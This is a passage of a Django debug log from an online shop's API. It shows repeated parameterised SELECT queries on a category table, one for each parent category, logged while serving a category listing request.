"shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-19 12:46:06,446 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-19 12:46:06,448 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-19 12:46:06,450 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-19 12:46:06,452 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-19 12:46:06,455 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-19 12:46:06,458 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-19 12:46:06,461 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-19 12:46:06,463 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-19 12:46:06,465 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-19 12:46:06,467 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-19 12:46:06,471 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-19 12:46:06,473 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-19 12:46:06,475 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-19 12:46:06,477 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-19 12:46:06,479 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-19 12:46:06,483 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-19 12:46:06,485 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-19 12:46:06,487 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-19 12:46:06,490 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-19 12:46:06,492 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-19 12:46:06,494 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-19 12:46:06,497 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-19 12:46:06,499 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-19 12:46:06,501 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-19 12:46:06,504 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-19 12:46:06,506 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [19/Dec/2019 12:46:06] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-19 12:46:15,744 utils 4252 140031747061504 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-19 12:46:15,751 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-19 12:46:15,755 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-19 12:46:15,757 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-19 12:46:15,760 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-19 12:46:15,762 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-19 12:46:15,765 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-19 12:46:15,767 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-19 12:46:15,769 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-19 12:46:15,772 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-19 12:46:15,775 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-19 12:46:15,777 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-19 12:46:15,779 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-19 12:46:15,781 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-19 12:46:15,784 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-19 12:46:15,787 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-19 12:46:15,789 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-19 12:46:15,791 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-19 12:46:15,793 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-19 12:46:15,797 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-19 12:46:15,799 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-19 12:46:15,801 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-19 12:46:15,803 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-19 12:46:15,805 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-19 12:46:15,807 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-19 12:46:15,811 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-19 12:46:15,813 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-19 12:46:15,815 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-19 12:46:15,817 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-19 12:46:15,819 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-19 12:46:15,823 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-19 12:46:15,825 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-19 12:46:15,827 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-19 12:46:15,829 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-19 12:46:15,831 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-19 12:46:15,835 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-19 12:46:15,838 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-19 12:46:15,840 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-19 12:46:15,844 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-19 12:46:15,847 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-19 12:46:15,850 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" 